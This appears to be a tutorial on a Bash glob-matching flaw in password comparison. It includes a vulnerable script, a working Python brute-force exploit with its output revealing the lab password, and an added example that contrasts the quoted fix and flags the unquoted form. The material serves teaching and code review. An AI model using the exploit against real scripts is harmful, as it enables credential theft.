Bash
Variable Comparison Vulnerability
#!/bin/bash
DB_USER="root"
DB_PASS="$(/usr/bin/cat /home/root/cred.txt)"
read -s -p "Enter password for $DB_USER: " USER_PASS
echo
# Unquoted right-hand side: $USER_PASS is matched as a pattern (the flaw discussed below)
if [[ $DB_PASS == $USER_PASS ]]; then
    echo "Password confirmed!"
else
    echo "Password confirmation failed!"
fi
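The vulnerability lies in how the variables are compared. Inside [[ ]], an unquoted right-hand side of == is treated as a pattern rather than a literal string, so wildcard characters in the user's input are interpreted instead of compared as-is.
The correct way would be this: "$var"
Instead of this: $var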
Exploit Vulnerability:
This vulnerability allows us to discover the password through brute force.
In this case, cred.txt contains the password k4l1L1nUx.
Because the right-hand side is unquoted, the program accepts [[ $DB_PASS == k* ]] just as it accepts [[ $DB_PASS == k4l1L1nUx ]].
So by testing one character at a time, we can discover the password. To automate this, we will use a Python script.
import string
import subprocess

# Candidate characters: letters and digits
charset = list(string.ascii_letters + string.digits)
password = ""
file = input("File name: ")
found = False
while not found:
    for character in charset:
        # Send the known prefix plus one candidate character and a trailing wildcard
        command = f"echo '{password}{character}*' | ./{file}"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
        if "Password confirmed!" in output:
            password += character
            # Uncomment the next line to print each step as the password is found.
            # print(password)
            break
    else:
        # No candidate extended the prefix: the password is complete
        found = True
print("The password is:", password)
The result upon executing the script:
kali@kali:~$ python3 script.py
File name: bash_vuln
k
k4
k4l
k4l1
k4l1L
k4l1L1
k4l1L1n
k4l1L1nU
k4l1L1nUx
The password is: k4l1L1nUx
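The difference between the two forms, as an added example that is not part of the original page: the same inputs are checked with the unquoted and the quoted comparison, and a rough grep heuristic flags the unquoted form during code review. STORED, compare, verdict and flag_unquoted_rhs are names assumed here, and all input values are constructed.

```bash
#!/bin/bash
# Added example. STORED is a constructed value, not the page's cred.txt.
STORED='c0nstructedPw'

# The two tests differ only in the quoting of the right-hand side.
VULNERABLE='[[ $1 == $2 ]]'     # unquoted: $2 is matched as a glob pattern
HARDENED='[[ $1 == "$2" ]]'     # quoted: $2 is compared as a literal string

# compare TEST STORED SUPPLIED: run TEST under bash ([[ ]] is not POSIX sh)
# and return its exit status (0 = accepted, 1 = rejected).
compare() {
    bash -c "$1" _ "$2" "$3"
}

# verdict TEST SUPPLIED: print "accept" or "reject" for STORED.
verdict() {
    if compare "$1" "$STORED" "$2"; then echo accept; else echo reject; fi
}

# Rough heuristic for code review: flag [[ ... == $var ]] or != with an
# unquoted expansion on the right. ShellCheck reports this as SC2053.
flag_unquoted_rhs() {
    grep -nE '\[\[[^]]*[!=]=[[:space:]]*\$'
}

# Constructed inputs: the real value, a prefix pattern, a wrong guess.
for supplied in "$STORED" 'c*' 'wrong'; do
    printf '%-16s vulnerable=%s hardened=%s\n' "$supplied" \
        "$(verdict "$VULNERABLE" "$supplied")" "$(verdict "$HARDENED" "$supplied")"
done

# The page's comparison line is flagged; its quoted form is not.
printf '%s\n' 'if [[ $DB_PASS == $USER_PASS ]]; then' \
              'if [[ $DB_PASS == "$USER_PASS" ]]; then' | flag_unquoted_rhs
```

With the quoted form, a stored value that itself contains * or ? is still compared character for character.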